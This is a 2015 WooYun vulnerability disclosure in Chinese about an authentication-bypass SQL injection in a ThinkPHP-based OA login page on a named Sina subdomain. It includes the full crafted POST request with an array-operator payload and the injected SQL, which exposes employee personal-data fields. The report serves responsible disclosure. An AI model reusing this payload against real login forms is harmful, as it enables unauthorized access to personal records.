2015-04-22: 细节已通知厂商并且等待厂商处理中 2015-04-22: 厂商已经确认,细节仅向厂商公开 2015-05-02: 细节向核心白帽子及相关领域专家公开 2015-05-12: 细节向普通白帽子公开 2015-05-22: 细节向实习白帽子公开 2015-06-06: 细节向公众公开
新浪某分站ThinkPHP框架存在SQL注入问题http://www.wooyun.org/bugs/wooyun-2014-086742
开启了ThinkPHP调试功能,每条SQL都能查看到http://oa.gd.sina.com.cn/login/check_login测试可构造万能密码 WooYun: ThinkPHP架构设计不合理极易导致SQL注入
POST /login/check_login HTTP/1.1Host: oa.gd.sina.com.cnProxy-Connection: keep-aliveContent-Length: 40Pragma: no-cacheCache-Control: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://oa.gd.sina.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://oa.gd.sina.com.cn/login/indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4emp_no[0]=neq&emp_no[1]=admin&password=1
变成执行了如下SQL:
SELECT User.emp_name AS name,User.id AS id,User.emp_no AS emp_no,User.emp_name AS emp_name,User.letter AS letter,User.password AS password,User.dept_id AS dept_id,User.position_id AS position_id,User.rank_id AS rank_id,User.sex AS sex,User.birthday AS birthday,User.last_login_ip AS last_login_ip,User.login_count AS login_count,User.pic AS pic,User.email AS email,User.duty AS duty,User.office_tel AS office_tel,User.mobile_tel AS mobile_tel,User.create_time AS create_time,User.update_time AS update_time,User.is_del AS is_del,User.openid AS openid,User.westatus AS westatus,User.rank_gwzn AS rank_gwzn,User.rank_name AS rank_name,User.leader AS leader,User.marriage AS marriage,User.native_place AS native_place,User.id_number AS id_number,User.nation AS nation,User.education AS education,User.graduate_school AS graduate_school,User.blood AS blood,User.constellation AS constellation,User.qq AS qq,User.weixin AS weixin,User.weibo AS weibo,User.domicile AS domicile,User.set_order AS set_order,User.is_admin AS is_admin,User.is_city AS is_city,User.grade_id AS grade_id,Dept.name AS dept_name FROM oa_user User JOIN oa_dept Dept ON Dept.id=User.dept_id WHERE ( User.emp_name <> 'admin' ) OR ( User.emp_no <> 'admin' ) LIMIT 1
更新thinkphp
危害等级:中
漏洞Rank:5
确认时间:2015-04-22 15:01
感谢关注新浪安全,漏洞修复中。
暂无